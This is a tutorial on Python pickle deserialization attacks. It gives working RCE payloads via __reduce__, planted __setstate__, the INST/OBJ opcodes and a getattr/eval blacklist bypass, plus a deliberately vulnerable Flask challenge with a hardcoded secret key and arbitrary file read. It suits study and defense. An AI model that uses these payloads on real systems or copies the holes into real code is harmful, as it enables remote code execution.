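Python ships with the pickle library for serializing and deserializing objects. Unlike the languages covered in the previous two posts, pickle has a stack machine and can be regarded as a small language in its own right: by writing opcodes by hand you can execute Python code, overwrite variables, and more. As a result, what pickle can parse is broader than what pickle can generate. Hand-written opcodes are more flexible than the output of pickle serialization, and some opcode sequences can never be produced by serializing an object. This makes for a more varied set of attack techniques.
The companion pickletools module makes it easy to inspect and debug pickled data.
A simple example: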
class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

import pickle
import pickletools

raw = pickle.dumps(Student(),protocol=3)
raw = pickletools.optimize(raw)
print(raw)
'''
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00EkiX\x05\x00\x00\x00gradeX\x04\x00\x00\x002021ub.'
'''
pickletools.dis(raw)
'''
    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ Student'
   20: )    EMPTY_TUPLE
   21: \x81 NEWOBJ
   22: }    EMPTY_DICT
   23: (    MARK
   24: X        BINUNICODE 'name'
   33: X        BINUNICODE 'Eki'
   41: X        BINUNICODE 'grade'
   51: X        BINUNICODE '2021'
   60: u        SETITEMS   (MARK at 23)
   61: b    BUILD
   62: .    STOP
highest protocol among opcodes = 2
'''
res = pickle.loads(raw)
print(res)
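As you can see, pickle serializes and deserializes objects through a sequence of instructions (opcodes). There are several pickle protocol versions, selectable with pickle.dumps(obj, protocol=x). pickletools.dis helps in understanding the generated byte stream by showing what each instruction does. For example, the 3 that follows the leading \x80 (PROTO) is the pickle protocol version.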
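The protocol header can be checked directly. The following is a minimal sketch, assuming a plain dict as the sample object (the variable names are only illustrative); it compares the first two bytes of streams produced with different protocols and reads the first opcode with pickletools.genops.

```python
import pickle
import pickletools

obj = {"name": "Eki", "grade": "2021"}

# Protocols 2 and above start with the PROTO opcode (0x80) followed by the version byte.
headers = {p: pickle.dumps(obj, protocol=p)[:2] for p in (2, 3, 4)}

# Protocol 0 is a text-oriented format and carries no PROTO header.
proto0 = pickle.dumps(obj, protocol=0)

# genops yields (opcode, argument, position) for each instruction without executing it.
first_op, first_arg, _ = next(pickletools.genops(pickle.dumps(obj, protocol=3)))
print(headers, first_op.name, first_arg)
```

Because genops only parses the stream, it is a convenient way to look at untrusted data without loading it.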
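To customize how an object is pickled, pickle provides the hook method __reduce__. Once defined, __reduce__ is called whenever the object is pickled. It returns either a string naming a global, which Python looks up and pickles, or a tuple. The tuple has two to five elements (Python 3.8 added an optional sixth, a state setter): a callable that is invoked to rebuild the object; a tuple of arguments for that callable; optionally, the state passed to __setstate__; optionally, an iterator yielding the list items to be pickled; and optionally, an iterator yielding the dict items to be pickled.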
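The optional elements are easier to see in a small case. The sketch below uses a hypothetical Bag class (not part of the original article) whose __reduce__ returns a four-element tuple: the callable list, empty arguments, no state, and an iterator over list items. Loading the result gives back a plain list, which shows that the stream records how to rebuild a value rather than the instance itself.

```python
import pickle

class Bag:
    """Hypothetical container used only for this illustration."""
    def __init__(self, items):
        self.items = list(items)

    def __reduce__(self):
        # (callable, args, state, list-item iterator):
        # rebuild by calling list(), skip the state, then append each item.
        return (list, (), None, iter(self.items))

restored = pickle.loads(pickle.dumps(Bag([1, 2, 3]), protocol=3))
print(type(restored), restored)
```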
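import os
import pickle
import pickletools
from typing import Any, Tuple, Union

cmd = 'id'

class Evil():
    def __init__(self) -> None:
        self.whatever = "whatever"
    def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
        # pickle records "call os.system(cmd)" instead of the Evil instance
        return os.system,(cmd,)

raw = pickletools.optimize(pickle.dumps(Evil(),protocol=3))
print(raw)
pickletools.dis(raw)
'''
b'\x80\x03cposix\nsystem\nX\x02\x00\x00\x00id\x85R.'
    0: \x80 PROTO      3
    2: c    GLOBAL     'posix system'
   16: X    BINUNICODE 'id'
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
'''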
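As you can see, once we override __reduce__ the serialized data changes completely and no longer has anything to do with the Evil class. The opcode R is closely tied to object.__reduce__(): it takes a callable from the stack together with the argument object pushed above it (which must be a tuple) and calls the callable with those arguments. In fact R corresponds exactly to object.__reduce__(): the return value of object.__reduce__() is what R operates on, so when an object defining this method is pickled, the resulting stream contains R.
In other words, loading this stream amounts to calling posix.system with the argument tuple ('id',).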
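The same effect can be observed with a harmless callable. This is a minimal sketch in which int stands in for os.system (the Demo class is hypothetical): the stream contains a REDUCE opcode, never mentions the class name, and loading it returns the result of the call.

```python
import pickle
import pickletools

class Demo:
    def __reduce__(self):
        # Harmless stand-in for os.system: loads() will call int("42").
        return (int, ("42",))

data = pickle.dumps(Demo(), protocol=3)
op_names = [op.name for op, arg, pos in pickletools.genops(data)]
result = pickle.loads(data)
print(op_names, result)
```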
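Now for another classic example: overwriting a global variable through pickle deserialization.
The obvious approach, similar to the one above, is to overwrite it by executing code with exec: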
import pickle

key = b'eki'

class A(object):
    def __reduce__(self):
        return (exec,("key=b'jacey'",))

a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key)
But what if the challenge forbids REDUCE outright, for example by filtering the byte R?
import pickle
import base64
import pickletools

class Student():
    def __init__(self,name:str,grade:str) -> None:
        self.name = name
        self.grade = grade
    def __eq__(self, o: object) -> bool:
        return type(o) is Student and \
            self.name == o.name and \
            self.grade == o.grade

import secret
# secret.py contains:
'''
name = "Jacey"
grade = "2019"
'''

def check(data:bytes)->str:
    if b'R' in data:
        return 'no reduce!'
    x = pickle.loads(data)
    print(secret.name,secret.grade)
    if(x != Student(secret.name,secret.grade)):
        return 'Not equal'
    return 'well done!'

payload =b"""\x80\x03
c
__main__\n
secret\n
}
(
Vname\n
Veki\n
Vgrade\n
V2019\n
u
b
0
c
__main__\n
Student\n
)
\x81
}
(
Vname\n
Veki\n
Vgrade\n
V2019\n
u
b
.
""".replace(b"\n\n",b"^^").replace(b"\n",b"").replace(b"^^",b"\n")
pickletools.dis(payload)
print(check(payload))
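In this case, c__main__\nsecret\n (GLOBAL) brings in the secret module. We then push a dict with the contents {'name': 'eki', 'grade': '2019'} and execute the BUILD instruction, which overwrites __main__.secret.name and __main__.secret.grade. At this point secret.name and secret.grade have been replaced with values of our choosing, so the Student object built afterwards with the same values passes the comparison.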
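The effect of BUILD on a module can be reproduced in isolation. The sketch below is an assumption-laden stand-in: instead of __main__ and a real secret.py it registers two hypothetical modules (demo_holder and demo_secret) in sys.modules, then loads a short hand-written stream that contains no R byte.

```python
import pickle
import sys
import types

# Hypothetical stand-ins for __main__ and the imported secret module.
secret = types.ModuleType("demo_secret")
secret.name, secret.grade = "Jacey", "2019"
holder = types.ModuleType("demo_holder")
holder.secret = secret
sys.modules["demo_holder"] = holder

payload = (
    b"cdemo_holder\nsecret\n"   # GLOBAL: push demo_holder.secret
    b"}(Vname\nVeki\nu"         # build {'name': 'eki'} with SETITEMS
    b"b."                       # BUILD merges it into secret.__dict__, then STOP
)
assert b"R" not in payload
pickle.loads(payload)
print(secret.name, secret.grade)
```

Only name is overwritten here; grade keeps its original value, which shows that BUILD updates the target's __dict__ key by key.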
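Going one step further: if R is filtered, can we still achieve command execution? Consider how the pure-Python Unpickler implements BUILD: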
class _Unpickler:
    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        # look up __setstate__ on inst; if it exists, it is called below
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build
This leads to the following payload:
import pickle
import pickletools

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

payload = b"""\x80\x03
c
__main__\n
Student\n
)
\x81
}
(
V__setstate__\n
c
os\n
system\n
u
b
Vls /\n
b
.""".replace(b"\n\n",b"^^").replace(b"\n",b"").replace(b"^^",b"\n")
pickletools.dis(payload)
res = pickle.loads(payload)
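By setting __setstate__ on inst we can achieve RCE as well: the first BUILD stores os.system as the instance's __setstate__, and the second BUILD calls it with the string we pushed.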
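The two-step behavior of BUILD can be traced with a harmless callable. In this sketch the module demo_build, the class Thing, and the function record are all hypothetical; record simply appends its argument to a list, so the list shows exactly what the second BUILD invoked.

```python
import pickle
import sys
import types

calls = []  # records every argument handed to the planted __setstate__

class Thing:
    pass

# Hypothetical module exposing a class and a harmless callable by name.
demo = types.ModuleType("demo_build")
demo.Thing = Thing
demo.record = calls.append
sys.modules["demo_build"] = demo

payload = (
    b"cdemo_build\nThing\n)\x81"                 # NEWOBJ: Thing.__new__(Thing)
    b"}(V__setstate__\ncdemo_build\nrecord\nu"   # {'__setstate__': record}
    b"b"                                         # 1st BUILD: no __setstate__ yet, __dict__ is updated
    b"Vhello\nb."                                # 2nd BUILD: calls record('hello')
)
obj = pickle.loads(payload)
print(calls)
```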
Besides writing pickle opcodes by hand, we can also get help from tools, for example:
PickleBuilder: a helper for hand-writing pickle opcodes.
Example:
import pickle
from PickleBuilder import PickleBuilder

p = PickleBuilder()
p.push_mark()
p.push_str("echo eki")
p.load_inst("os","system")
print(pickle.loads(p.compile()))
pker: generates the corresponding pickle by parsing Python-like source code through its AST.
Example:
class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

payload = """student = OBJ(GLOBAL('__main__', 'Student'))
student.name = 'Eki'
student.grade = '2022'
return student
"""
from pickle import loads
from pker import cons
#print(cons(payload))
print(loads(cons(payload)))
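Analyzing the opcodes shows that three of them are directly tied to calling functions: R, i, and o. Together with the RCE through an overwritten __setstate__ described earlier, this gives four directions for building a payload:
R: [callable] [tuple] R
Calls a callable object.
b'''cos
system
(S'whoami'
tR.'''
i: i[module]\n[callable]\n
Equivalent to a combination of c and o: it first fetches a global function, then finds the previous MARK on the stack, collects the data in between into a tuple, and calls the global function with that tuple as arguments (or instantiates an object).
b'''(S'whoami'
ios
system
.'''
o: MARK [callable] [args...] o
Same as INST, except that the callable is taken from the stack with stack.pop instead of being read with readline.
b'''(cos
system
S'whoami'
o.'''
b: According to the Unpickler code, during load_build (that is, while the b opcode executes), a custom __setstate__ is called if one exists:
    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        # look up __setstate__ on inst; if it exists, it is called below
        setstate = getattr(inst, "__setstate__", None)
        if setstate is not None:
            setstate(state)
            return
So arbitrary functions can be called by planting a __setstate__. This method does, however, require a usable class.
b'''\x80\x03c__main__
Student
)\x81}(V__setstate__
cos
system
ubVls /
b.'''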
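The three call opcodes can be compared side by side with a harmless target. The following sketch replaces os.system with the builtin len, so each stream simply evaluates len('abc') through R, i, and o respectively.

```python
import pickle

# Each stream calls the harmless builtin len('abc') through a different opcode.
via_reduce = b"cbuiltins\nlen\n(S'abc'\ntR."   # GLOBAL, MARK, STRING, TUPLE, REDUCE
via_inst = b"(S'abc'\nibuiltins\nlen\n."       # MARK, STRING, INST
via_obj = b"(cbuiltins\nlen\nS'abc'\no."       # MARK, GLOBAL, STRING, OBJ

results = [pickle.loads(p) for p in (via_reduce, via_inst, via_obj)]
print(results)
```

Note that only the first stream contains the byte R, so a filter on that byte alone leaves the other two untouched.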
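The first, blunt approach is to ban every opcode that can lead to RCE, namely the i, o, R, and b mentioned above. But b clearly cannot be banned, because ordinary deserialization needs it too, and filtering i, o, and R also causes considerable collateral damage.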
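The collateral damage of byte-level filtering is easy to demonstrate. The sketch below is illustrative only and not a recommended defense: a hypothetical helper risky_opcodes parses the stream with pickletools.genops and reports call-capable opcodes, and the result is compared with a naive check for the byte R.

```python
import pickle
import pickletools

# Opcodes that can import a global or invoke a callable during loading.
RISKY = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def risky_opcodes(data: bytes) -> set:
    """Return the names of call-capable opcodes present in a pickle stream."""
    return {op.name for op, arg, pos in pickletools.genops(data)} & RISKY

benign = pickle.dumps("Reduce", protocol=3)   # contains the byte b'R' as data only
handmade = b"(cbuiltins\nlen\nS'abc'\no."     # calls len('abc') without any b'R'
print(b"R" in benign, risky_opcodes(benign))
print(b"R" in handmade, risky_opcodes(handmade))
```

The harmless string is rejected by the byte filter while the hand-written stream passes it, which is why filtering raw bytes both over-blocks and under-blocks.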
The second mitigation is to override the Unpickler's find_class to restrict which modules can be used, for example:
import builtins
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        # only names from builtins that are not blacklisted may be resolved
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
However, with getattr we can easily bypass this restriction:
from pker import cons

payload = """getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()
__builtins__ = dict_get(builtins, '__builtins__')
eval = getattr(__builtins__, 'eval')
eval('__import__("os").system("whoami")')
return
"""
payload = cons(payload)
# loads is the RestrictedUnpickler-based loads defined above
loads(payload)
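This is equivalent to
builtins.dict.get(builtins.globals(),'__builtins__').eval('__import__("os").system("whoami")')
That is, we use the permitted builtins to obtain a fresh reference to builtins, fetch the blacklisted eval from it, and thereby bypass the restriction.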
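Since a blacklist leaves getattr and globals reachable, a stricter variant is to allow only an explicit set of names. The following sketch follows the allowlist pattern shown in the official pickle documentation; the names AllowlistUnpickler, SAFE_BUILTINS, and restricted_loads are chosen here for illustration, and the set of permitted builtins is an assumption that would need tailoring to the application.

```python
import builtins
import io
import pickle

SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only names explicitly listed are resolvable; everything else is rejected.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps([1, 2, range(15)])))
try:
    restricted_loads(b"cbuiltins\ngetattr\n.")
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

With this variant the getattr chain used above fails at its first GLOBAL, because getattr is not in the permitted set.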
from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

app = Flask(__name__)
app.config['SECRET_KEY'] = "y0u-wi11_neuer_kn0vv-!@#se%32"

@app.route('/admin', methods = ["POST","GET"])
def admin():
    if('{}'.format(session['username'])!= 'admin' and str(session['username'] , encoding = "utf-8")!= 'admin'):
        return "not admin"
    try:
        data = base64.b64decode(session['data'])
        if "R" in data.decode():
            return "nonono"
        loads(data)
    except Exception as e:
        print(e)
    return "success"

@app.route('/login', methods = ["GET","POST"])
def login():
    username = request.form.get('username')
    password = request.form.get('password')
    imagePath = request.form.get('imagePath')
    session['username'] = username + password
    session['data'] = base64.b64encode(pickle.dumps('hello' + username, protocol=0))
    try:
        f = open(imagePath,'rb').read()
    except Exception as e:
        f = open('static/image/error.png','rb').read()
    imageBase64 = base64.b64encode(f)
    return render_template("login.html", username = username, password = password, data = bytes.decode(imageBase64))

@app.route('/', methods = ["GET","POST"])
def index():
    return render_template("index.html")

if __name__ == '__main__':
    app.run(host='0.0.0.0', port='8888')
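It is worth noting that besides pickle.load, other Python modules can also trigger pickle deserialization vulnerabilities.
For example, numpy.load() first tries to load the data in NumPy's own format; if that fails, it tries the pickle format, which triggers pickle deserialization. Since NumPy 1.16.3 this fallback only happens when allow_pickle=True is passed.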
PyYAML https://xz.aliyun.com/t/7923
Official pickle documentation https://docs.python.org/zh-cn/3/library/pickle.html
Python deserialization attacks from scratch: how pickle works & RCE without reduce https://zhuanlan.zhihu.com/p/89132768
A first look at pickle deserialization https://xz.aliyun.com/t/7436